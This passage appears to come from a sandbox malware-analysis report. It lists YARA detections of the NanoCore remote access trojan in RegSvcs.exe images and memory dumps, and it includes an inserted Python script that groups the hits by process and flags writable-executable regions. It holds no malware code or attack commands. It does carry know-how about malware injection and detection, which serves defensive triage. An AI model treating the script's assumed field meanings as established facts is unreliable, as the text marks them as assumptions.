Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
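The hits above (UNPACKEDPE entries named `<pid>.<stage>.<image>.<addr>.<n>[.raw].unpack`) and the memory-dump hits that follow (`.sdmp` entries whose first field is the same analysis process number written as eight hex digits) identify the same processes in two notations, so a triage question such as "which processes actually carry a NanoCore image, and is any of it in writable-executable memory" has to be answered by joining the two. The following parser is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling; it normalises both notations, maps the hex process numbers back to image names via the unpack entries, and flags dumps whose protection field is RWX. The sample lines are constructed in the report's format, and two field interpretations are assumptions rather than documented facts: that the first field of an `.sdmp` name is the analysis process number in hex, and that the field after the base address is a Win32 `PAGE_*` protection constant.

```python
"""Triage helper for Joe Sandbox YARA hit listings (added example, not report tooling)."""
import re
from collections import defaultdict

# Constructed sample: a handful of lines in the same shape as the report's
# "Source: ... Matched rule: ..." entries, not the full listing.
SAMPLE_LINES = """\
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
"""

# "<pid>.<stage>.<image>.<hex addr>.<n>[.raw].unpack": the image name itself
# contains dots, so it is matched lazily and anchored by the hex address.
UNPACK_RE = re.compile(
    r"^Source: (?P<pid>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<addr>[0-9a-f]+)\."
    r"\d+\.(?:raw\.)?unpack, type: UNPACKEDPE Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$"
)
# "<pid hex>.<stage hex>.<seq>.<base addr>.<prot>.<f1>.<f2>.<f3>.sdmp"
# Assumption: the first field is the analysis process number in hex.
MEMORY_RE = re.compile(
    r"^Source: (?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\."
    r"(?P<prot>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp, type: MEMORY Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$"
)

# Assumption: the field after the base address is a Win32 PAGE_* protection
# constant (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE, ...).
PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX"}


def parse_hit(line):
    """Return a normalised record for one report line, or None if it is not a YARA hit."""
    m = UNPACK_RE.match(line)
    if m:
        return {"pid": int(m["pid"]), "stage": int(m["stage"]), "kind": "unpacked",
                "image": m["image"], "addr": int(m["addr"], 16), "prot": None,
                "rule": m["rule"], "author": m["author"]}
    m = MEMORY_RE.match(line)
    if m:
        return {"pid": int(m["pid"], 16), "stage": int(m["stage"], 16), "kind": "memory",
                "image": None, "addr": int(m["addr"], 16), "prot": int(m["prot"], 16),
                "rule": m["rule"], "author": m["author"]}
    return None


def summarize(text):
    """Group hits per analysis process: image name, distinct rules, hit count, RWX dump addresses."""
    hits = [h for h in (parse_hit(ln) for ln in text.splitlines()) if h]
    # Unpack entries carry the image name; memory dumps only carry the process number.
    images = {h["pid"]: h["image"] for h in hits if h["image"]}
    per_pid = defaultdict(lambda: {"image": None, "rules": set(), "hits": 0, "rwx_dumps": []})
    for h in hits:
        p = per_pid[h["pid"]]
        p["image"] = images.get(h["pid"])
        p["rules"].add(h["rule"])
        p["hits"] += 1
        if h["prot"] is not None and PAGE_PROTECT.get(h["prot"] & 0xFF) == "RWX":
            p["rwx_dumps"].append(hex(h["addr"]))
    return dict(per_pid)


def hosts(summary, min_rules=2):
    """Images in which at least `min_rules` distinct rules fired (corroborated, not a single hit)."""
    return sorted({v["image"] for v in summary.values() if v["image"] and len(v["rules"]) >= min_rules})


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    for pid, v in sorted(s.items()):
        print(f"pid {pid:>2} {v['image'] or '?':<12} hits={v['hits']} rules={len(v['rules'])} rwx={v['rwx_dumps']}")
    print("payload hosts:", hosts(s))
```

Run against the full listing, the join shows the payload in both the AutoIt stage (`itugx.exe`) and the injection target (`RegSvcs.exe`), which matches the report's "Injects a PE file into a foreign processes" signature; a dump in a .NET host with an RWX protection field is the kind of region worth carving out for configuration extraction first. Requiring two or more distinct rules per process before treating it as a host is a deliberate choice: a single generic rule firing in one transient dump is weaker evidence than independent rules from different authors agreeing on the same process.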
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
